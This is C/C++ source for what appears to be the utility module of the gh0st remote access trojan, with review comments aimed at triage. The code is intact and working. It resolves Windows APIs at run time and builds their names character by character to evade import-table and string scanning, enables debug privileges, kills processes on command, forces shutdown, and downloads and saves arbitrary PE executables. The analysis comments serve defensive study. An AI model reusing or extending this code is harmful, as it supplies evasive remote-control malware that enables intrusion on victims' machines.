gh0st_util

/* 
 * File:   util.h
 * Author: Administrator
 *
 * Created on 2014年3月19日, 上午9:26
 */

#ifndef UTIL_H
#define	UTIL_H
#include "stdafx.h"

// Delete the files under a directory tree (recurses into sub-directories).
bool DeleteDirectory(LPCTSTR lpszDirectory);
// Create the missing directories along pszDirPath.
bool MakeSureDirectoryPathExists(LPCTSTR pszDirPath);
// Fetch the external (WAN) IP address.
void OnGetwan();
// Raise privileges: enable or disable the privilege named PName on the current process token.
BOOL DebugPrivilege(const char *PName,BOOL bEnable);
// Terminate several processes; invoked as KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
void KillProcess(LPBYTE lpBuffer, UINT nSize);
// Calls ExitWindowsEx after enabling the shutdown privilege.
void ShutdownWindows(DWORD dwReason );
// Download szURL to the local file szFileName.
bool http_get(LPCTSTR szURL, LPCTSTR szFileName);
// Modify process privileges (enables SE_DEBUG_NAME on the current process).
BOOL EnablePri();
// Return a pointer past the leading spaces of szData.
char *DelSpace(char *szData);


#endif	/* UTIL_H */
#include "stdafx.h"

#include "util.h"
#include  <afxinet.h>

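// Recursively deletes the contents of lpszDirectory and then the directory itself.
//
// lpszDirectory - directory to remove, without a trailing backslash.
//
// Returns true only when the final RemoveDirectory() succeeds. Failures to
// delete individual entries are not reported directly; they surface as a
// failed RemoveDirectory() on the (then non-empty) parent.
//
// Safety properties of this version:
//  - every composed path is length-checked before wsprintf(), which has no
//    destination-size argument (it only stops at 1024 characters) and would
//    otherwise overrun the MAX_PATH stack buffers;
//  - only the "." and ".." pseudo-entries are skipped, so names that merely
//    start with a dot are handled like any other entry;
//  - directory reparse points (junctions, symlinks) are unlinked, never
//    followed, so the walk cannot be redirected outside the requested tree.
bool DeleteDirectory(LPCTSTR lpszDirectory)
{
	if (lpszDirectory == NULL)
		return false;

	const int nDirLen = lstrlen(lpszDirectory);
	if (nDirLen + 4 + 1 > MAX_PATH)	// room for "\*.*" and the terminator
		return false;

	WIN32_FIND_DATA	wfd;
	char	lpszFilter[MAX_PATH];
	wsprintf(lpszFilter, "%s\\*.*", lpszDirectory);
	HANDLE hFind = FindFirstFile(lpszFilter, &wfd);
	if (hFind == INVALID_HANDLE_VALUE) // nothing found, or the search failed
		return false;
	do
	{
		// Skip exactly "." and "..".
		const bool bIsDotEntry = wfd.cFileName[0] == '.' &&
			(wfd.cFileName[1] == '\0' ||
			(wfd.cFileName[1] == '.' && wfd.cFileName[2] == '\0'));
		if (bIsDotEntry)
			continue;

		// Entry whose full path would not fit: leave it in place, the final
		// RemoveDirectory() then fails and the caller sees false.
		if (nDirLen + 1 + lstrlen(wfd.cFileName) + 1 > MAX_PATH)
			continue;

		char strChild[MAX_PATH];
		wsprintf(strChild, "%s\\%s", lpszDirectory, wfd.cFileName);

		if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
		{
			if (wfd.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT)
				RemoveDirectory(strChild);	// remove the link itself, do not descend
			else
				DeleteDirectory(strChild);
		}
		else
		{
			DeleteFile(strChild);
		}
	} while (FindNextFile(hFind, &wfd));
	FindClose(hFind); // close the find handle

	return RemoveDirectory(lpszDirectory) != FALSE;
}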
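// Creates every missing directory named in pszDirPath.
//
// Only components that are followed by a backslash are created; whatever
// comes after the last backslash is left alone, so "C:\a\b\file.txt" creates
// C:\a and C:\a\b. A leading UNC prefix (\\Server\Share\) or drive root
// (X:\) is skipped and never passed to CreateDirectory.
//
// pszDirPath - path to walk; NULL is rejected.
//
// Returns true when every component exists as a directory afterwards, false
// on allocation failure, when a component exists but is not a directory,
// when CreateDirectory fails for a reason other than ERROR_ALREADY_EXISTS,
// or when a structured exception is raised while walking the path.
bool MakeSureDirectoryPathExists(LPCTSTR pszDirPath)
{
	LPTSTR p;
	LPTSTR pszDirCopy;
	DWORD dwAttributes;
	bool bOk = true;

	if(pszDirPath == NULL)
		return false;

	// Work on a private copy because separators are temporarily overwritten.
	// Allocated before the __try so the handler never sees an unset pointer.
	pszDirCopy = (LPTSTR)malloc(sizeof(TCHAR) * (lstrlen(pszDirPath) + 1));
	if(pszDirCopy == NULL)
		return false;

	__try
	{
		lstrcpy(pszDirCopy, pszDirPath);
		p = pszDirCopy;
		//  If the first two characters are "\\", this is a UNC path and we
		//  skip forward past \\Server\Share\.
		if((*p == TEXT('\\')) && (*(p+1) == TEXT('\\')))
		{
			p += 2;         // Skip over the leading "\\".
			//  Skip until we hit the first "\" (\\Server\).
			while(*p && *p != TEXT('\\'))
			{
				p = CharNext(p);
			}
			// Advance over it.
			if(*p)
			{
				p++;
			}
			//  Skip until we hit the second "\" (\\Server\Share\).
			while(*p && *p != TEXT('\\'))
			{
				p = CharNext(p);
			}
			// Advance over it also.
			if(*p)
			{
				p++;
			}
		}
		// Not a UNC.  See if it's <drive>:  The *p test keeps an empty string
		// from reading one element past the end of the copy.
		else if(*p && *(p+1) == TEXT(':'))
		{
			p += 2;
			// If it exists, skip over the root specifier
			if(*p == TEXT('\\'))
			{
				p++;
			}
		}
		while(*p && bOk)
		{
			if(*p == TEXT('\\'))
			{
				// Cut the copy at this separator to test the prefix.
				*p = TEXT('\0');
				dwAttributes = GetFileAttributes(pszDirCopy);
				if(dwAttributes == INVALID_FILE_ATTRIBUTES)
				{
					// Nothing exists with this name: create it. Another
					// creator winning the race is not an error.
					if(!CreateDirectory(pszDirCopy, NULL) &&
						GetLastError() != ERROR_ALREADY_EXISTS)
					{
						bOk = false;
					}
				}
				else if((dwAttributes & FILE_ATTRIBUTE_DIRECTORY) != FILE_ATTRIBUTE_DIRECTORY)
				{
					// Something exists with this name, but it's not a directory.
					bOk = false;
				}

				*p = TEXT('\\');
			}
			p = CharNext(p);
		}
	}
	__except(EXCEPTION_EXECUTE_HANDLER)
	{
		bOk = false;
	}
	free(pszDirCopy);
	return bOk;
}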
// Looks up the machine's external (WAN) IP address and shows it in a message box.
//
// The address comes from the body of an HTTP GET to the hard-coded URL
// http://ip.3322.org/ (plain HTTP, so the reply is unauthenticated and is
// displayed exactly as received). Any CException raised by the MFC internet
// classes is reported to the user and deleted.
//
// For triage: the hard-coded URL is a network indicator of this code.
//
// NOTE(review): pBuf is not released if Read() throws, and pFile is closed
// but never deleted - confirm ownership of the object OpenURL returns.
void OnGetwan() 
{
	try
	{
		CInternetSession session;
		CString strURL(_T("http://ip.3322.org/"));
		CFile* pFile = session.OpenURL(strURL);
		// Size the buffer from the length the file object reports, plus a terminator.
		DWORD dwLen = pFile->GetLength();
		char* pBuf = new char[dwLen+1];
		// Zero-fill so the data is NUL-terminated for the CString conversion below.
		memset(pBuf, 0, sizeof(char)*(dwLen+1));
		pFile->Read(pBuf, dwLen);
		//SetDlgItemText(IDC_IP, CString(pBuf));
		AfxMessageBox(CString(pBuf));
		delete[] pBuf;
		pBuf = NULL;
		pFile->Close();
		//g_pLogView->AddToLog("external IP retrieved successfully");
	}
	catch (CException* e)
	{
		e->ReportError();
		e->Delete();
	}
}
// Enables or disables one named privilege on the current process token.
//
// PName   - privilege name handed to LookupPrivilegeValueA; callers in this
//           file pass SE_DEBUG_NAME and SE_SHUTDOWN_NAME.
// bEnable - TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears the attribute.
//
// Returns FALSE when OpenProcessToken fails or when GetLastError() is not
// ERROR_SUCCESS after AdjustTokenPrivileges; TRUE otherwise.
//
// Analysis notes (for readers triaging this sample):
//  - Every Win32 call except GetCurrentProcess/GetProcAddress/LoadLibrary is
//    reached through a pointer resolved at run time with
//    GetProcAddress(LoadLibrary(...)), presumably to keep those APIs out of
//    the import table.
//  - "GetLastError", "ADVAPI32.dll" and "CloseHandle" are assembled character
//    by character in local arrays, so they do not appear as contiguous string
//    literals; "KERNEL32.dll", "AdjustTokenPrivileges",
//    "LookupPrivilegeValueA" and "OpenProcessToken" are ordinary literals and
//    remain usable for static string matching.
//  - The randomly named locals (FhTZBW, KIoFqQPSy, DDZGlGm) recur in other
//    functions of this file with the same contents.
//
// NOTE(review): none of the resolved pointers is checked for NULL, the
// LookupPrivilegeValueA result is ignored (the LUID is used even if the
// lookup failed), and the module handles from LoadLibrary are never freed.
BOOL DebugPrivilege(const char *PName,BOOL bEnable)
{
	// Typedef declares a BOOL return; the Win32 GetLastError returns DWORD.
	typedef BOOL (WINAPI *GetLastErrorT)(VOID);
	// "GetLastError", built on the stack instead of as a string literal.
	char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'};
	GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW);

	typedef BOOL
		(WINAPI
		*AdjustTokenPrivilegesT)(
		__in      HANDLE TokenHandle,
		__in      BOOL DisableAllPrivileges,
		__in_opt  PTOKEN_PRIVILEGES NewState,
		__in      DWORD BufferLength,
		__out_bcount_part_opt(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
		__out_opt PDWORD ReturnLength
		);	
	// "ADVAPI32.dll", built on the stack; reused for the three lookups below.
	char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
	AdjustTokenPrivilegesT pAdjustTokenPrivileges=(AdjustTokenPrivilegesT)GetProcAddress(LoadLibrary(KIoFqQPSy),"AdjustTokenPrivileges");

	typedef BOOL
		(WINAPI
		*LookupPrivilegeValueAT)(
		__in_opt LPCSTR lpSystemName,
		__in     LPCSTR lpName,
		__out    PLUID   lpLuid
		);
	LookupPrivilegeValueAT pLookupPrivilegeValueA=(LookupPrivilegeValueAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupPrivilegeValueA");

	typedef BOOL
		(WINAPI
		*OpenProcessTokenT)(
		__in        HANDLE ProcessHandle,
		__in        DWORD DesiredAccess,
		__deref_out PHANDLE TokenHandle
		);	
	OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken");

	typedef BOOL (WINAPI *CloseHandleT)
		(
		__in HANDLE hObject
		);
	// "CloseHandle", built on the stack.
	char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
	CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);

	BOOL              bResult = TRUE;
	HANDLE            hToken;
	TOKEN_PRIVILEGES  TokenPrivileges;

	// Open this process's own token with the rights needed to adjust it.
	if (!pOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
	{
		bResult = FALSE;
		return bResult;
	}
	TokenPrivileges.PrivilegeCount = 1;
	TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

	pLookupPrivilegeValueA(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
	pAdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
	// The outcome is read from GetLastError rather than the return value:
	// AdjustTokenPrivileges can return success without having assigned the
	// privilege (ERROR_NOT_ALL_ASSIGNED).
	if (pGetLastError() != ERROR_SUCCESS)
	{
		bResult = FALSE;
	}
	pCloseHandle(hToken);
	return bResult;	
}
// Terminates every process whose id is listed in lpBuffer.
//
// lpBuffer - packed array of 32-bit process ids, read four bytes at a time.
// nSize    - size of that array in bytes.
//
// SE_DEBUG_NAME is enabled on the current token for the duration of the loop
// and disabled again afterwards. Each id is opened with PROCESS_ALL_ACCESS
// and terminated with exit code 0. Nothing is returned, so the caller cannot
// tell which terminations succeeded.
//
// Analysis notes: TerminateProcess, CloseHandle and Sleep are resolved at run
// time through GetProcAddress(LoadLibrary("KERNEL32.dll"), ...); OpenProcess
// is called directly. pSleep is resolved but never used in this function.
// The id list presumably arrives from the remote side of the tool - verify
// against the caller.
//
// NOTE(review): the OpenProcess result is not checked, so a NULL handle is
// passed on to TerminateProcess/CloseHandle when the open fails. When nSize
// is not a multiple of 4 the last 4-byte read extends past nSize. The
// prototype comment in util.h shows the buffer passed as lpBuffer + 1, so the
// DWORD reads are presumably unaligned.
void KillProcess(LPBYTE lpBuffer, UINT nSize)
{
	typedef VOID (WINAPI *SleepT)
		(
		__in DWORD dwMilliseconds
		);
	SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep");

	typedef BOOL (WINAPI *TerminateProcessT)
		(
		__in HANDLE hProcess, __in UINT uExitCode
		);
	TerminateProcessT pTerminateProcess = (TerminateProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"TerminateProcess");

	typedef BOOL (WINAPI *CloseHandleT)
		(
		__in HANDLE hObject
		);
	// "CloseHandle", built on the stack instead of as a string literal.
	char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
	CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);

	HANDLE hProcess = NULL;
	DebugPrivilege(SE_DEBUG_NAME, TRUE);

	// One process id per 4-byte step.
	for (unsigned int i = 0; i < nSize; i += 4)
	{
		hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *(LPDWORD)(lpBuffer + i));
		pTerminateProcess(hProcess, 0);
		pCloseHandle(hProcess);
	}
	DebugPrivilege(SE_DEBUG_NAME, FALSE);
}

// Calls ExitWindowsEx with SE_SHUTDOWN_NAME enabled on the current token.
//
// dwReason - despite its name, this value is passed as the first argument
//            (uFlags) of ExitWindowsEx; the reason argument is always 0.
//
// ExitWindowsEx is resolved at run time from USER32.dll via
// GetProcAddress(LoadLibrary(...)) rather than imported. The privilege is
// disabled again after the call. The ExitWindowsEx result is not checked and
// nothing is returned to the caller.
void ShutdownWindows(DWORD dwReason )
{

	typedef BOOL
		(WINAPI
		*ExitWindowsExT)(
		__in UINT uFlags,
		__in DWORD dwReason);
	ExitWindowsExT pExitWindowsEx=(ExitWindowsExT)GetProcAddress(LoadLibrary("USER32.dll"),"ExitWindowsEx");

	DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
	pExitWindowsEx(dwReason, 0);
	DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);	
}
// Downloads szURL with WinINet and writes the body to szFileName.
//
// szURL      - URL handed to InternetOpenUrl (INTERNET_FLAG_RELOAD).
// szFileName - destination path, opened with CREATE_ALWAYS.
//
// Returns false when InternetOpen or InternetOpenUrl fails, or when the first
// chunk read does not start with IMAGE_DOS_SIGNATURE. Returns true otherwise,
// including the case where the destination file could not be opened (bRet is
// never cleared on that path).
//
// Analysis notes (for readers triaging this sample):
//  - The only validation of the download is the DOS-header magic of the first
//    chunk, i.e. the function accepts anything shaped like a PE file; there
//    is no signature, hash or origin check on what is written to disk.
//  - The session uses the fixed User-Agent "Mozilla/4.0 (compatible)" and the
//    preconfigured system proxy settings (INTERNET_OPEN_TYPE_PRECONFIG).
//  - WriteFile, CreateFileA and CloseHandle are resolved at run time through
//    GetProcAddress(LoadLibrary(...)); the WinINet calls are made directly.
//
// NOTE(review): hInternet is not closed when InternetOpenUrl fails; the
// destination file is created before the content check, so a rejected
// download leaves an empty file behind; the InternetReadFile and WriteFile
// results are ignored.
bool http_get(LPCTSTR szURL, LPCTSTR szFileName)
{
	typedef BOOL (WINAPI *WriteFileT)
		(
		__in        HANDLE hFile,
		__in_bcount(nNumberOfBytesToWrite) LPCVOID lpBuffer,
		__in        DWORD nNumberOfBytesToWrite,
		__out_opt   LPDWORD lpNumberOfBytesWritten,
		__inout_opt LPOVERLAPPED lpOverlapped
		);
	WriteFileT pWriteFile = (WriteFileT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteFile");

	typedef HANDLE (WINAPI *CreateFileAT)
		(
		__in     LPCSTR lpFileName,
		__in     DWORD dwDesiredAccess,
		__in     DWORD dwShareMode,
		__in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes,
		__in     DWORD dwCreationDisposition,
		__in     DWORD dwFlagsAndAttributes,
		__in_opt HANDLE hTemplateFile
		);	
	CreateFileAT pCreateFileA= (CreateFileAT)GetProcAddress(LoadLibrary("kernel32.dll"),"CreateFileA");

	typedef BOOL (WINAPI *CloseHandleT)
		(
		__in HANDLE hObject
		);
	// "CloseHandle", built on the stack instead of as a string literal.
	char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
	CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);
	HINTERNET	hInternet, hUrl;
	HANDLE		hFile;
	char		buffer[1024];
	DWORD		dwBytesRead = 0;
	DWORD		dwBytesWritten = 0;
	BOOL		bIsFirstPacket = true;
	BOOL		bRet = true;
	hInternet = InternetOpen("Mozilla/4.0 (compatible)", INTERNET_OPEN_TYPE_PRECONFIG, NULL,INTERNET_INVALID_PORT_NUMBER,0);
	if (hInternet == NULL)
		return false;
	hUrl = InternetOpenUrl(hInternet, szURL, NULL, 0, INTERNET_FLAG_RELOAD, 0);
	if (hUrl == NULL)
		return false;
	hFile = pCreateFileA(szFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
	if (hFile != INVALID_HANDLE_VALUE)
	{
		// Copy the response in 1024-byte chunks until a read returns 0 bytes.
		do
		{
			memset(buffer, 0, sizeof(buffer));
			InternetReadFile(hUrl, buffer, sizeof(buffer), &dwBytesRead);
			// Check whether the first packet is a valid PE file (DOS magic only).
			if (bIsFirstPacket && ((PIMAGE_DOS_HEADER)buffer)->e_magic != IMAGE_DOS_SIGNATURE)
			{
				bRet = false;
				break;
			}
			bIsFirstPacket = false;
			pWriteFile(hFile, buffer, dwBytesRead, &dwBytesWritten, NULL);
		} while(dwBytesRead > 0);
		pCloseHandle(hFile);
	}
	InternetCloseHandle(hUrl);
	InternetCloseHandle(hInternet);
	return bRet;
}
// Enables SE_DEBUG_NAME on the current process token.
//
// Returns FALSE when OpenProcessToken fails; otherwise TRUE exactly when
// GetLastError() is ERROR_SUCCESS after the AdjustTokenPrivileges call.
//
// This repeats what DebugPrivilege(SE_DEBUG_NAME, TRUE) does, with the same
// run-time resolution of GetCurrentProcess, AdjustTokenPrivileges,
// LookupPrivilegeValueA, OpenProcessToken and GetLastError through
// GetProcAddress(LoadLibrary(...)). "ADVAPI32.dll" and "GetLastError" are
// assembled on the stack; the remaining names are ordinary string literals.
//
// NOTE(review): hToken is never closed, the resolved pointers are not checked
// for NULL, and the LookupPrivilegeValueA result is ignored.
BOOL EnablePri()
{
	typedef __out HANDLE (WINAPI *GetCurrentProcessT)(VOID);
	GetCurrentProcessT pGetCurrentProcess = (GetCurrentProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentProcess");

	typedef BOOL
		(WINAPI
		*AdjustTokenPrivilegesT)(
		__in      HANDLE TokenHandle,
		__in      BOOL DisableAllPrivileges,
		__in_opt  PTOKEN_PRIVILEGES NewState,
		__in      DWORD BufferLength,
		__out_bcount_part_opt(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
		__out_opt PDWORD ReturnLength
		);	
	// "ADVAPI32.dll", built on the stack instead of as a string literal.
	char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
	AdjustTokenPrivilegesT pAdjustTokenPrivileges=(AdjustTokenPrivilegesT)GetProcAddress(LoadLibrary(KIoFqQPSy),"AdjustTokenPrivileges");


	typedef BOOL
		(WINAPI
		*LookupPrivilegeValueAT)(
		__in_opt LPCSTR lpSystemName,
		__in     LPCSTR lpName,
		__out    PLUID   lpLuid
		);
	LookupPrivilegeValueAT pLookupPrivilegeValueA=(LookupPrivilegeValueAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupPrivilegeValueA");


	typedef BOOL
		(WINAPI
		*OpenProcessTokenT)(
		__in        HANDLE ProcessHandle,
		__in        DWORD DesiredAccess,
		__deref_out PHANDLE TokenHandle
		);	
	OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken");

	HANDLE hToken;
	if ( pOpenProcessToken(pGetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
	{
		TOKEN_PRIVILEGES tkp;

		pLookupPrivilegeValueA( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid );// look up the LUID of the privilege to change
		tkp.PrivilegeCount=1;
		tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
		pAdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL );// ask the system to adjust the process privileges
		typedef BOOL (WINAPI *GetLastErrorT)
			(
			VOID
			);
		// "GetLastError", built on the stack instead of as a string literal.
		char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'};
		GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW);
		// Success is judged by the last-error value, not by the return value
		// of AdjustTokenPrivileges.
		return( (pGetLastError()==ERROR_SUCCESS) );
	}else{
		return FALSE;
	}
}
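// Skips the leading space characters of a NUL-terminated string.
//
// szData - string to scan; may be NULL.
//
// Returns a pointer into the same buffer at the first character that is not
// a space (' '), which is the terminator for an all-space string. Nothing is
// copied or modified. Only the space character is skipped; tabs and other
// whitespace are left in place. NULL is returned for a NULL argument instead
// of being dereferenced.
char *DelSpace(char *szData)
{
	if (szData == NULL)
		return NULL;

	// A direct comparison replaces the one-character strnicmp() call: case
	// folding is meaningless for ' ' and the result is identical.
	while (*szData == ' ')
		szData++;

	return szData;
}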

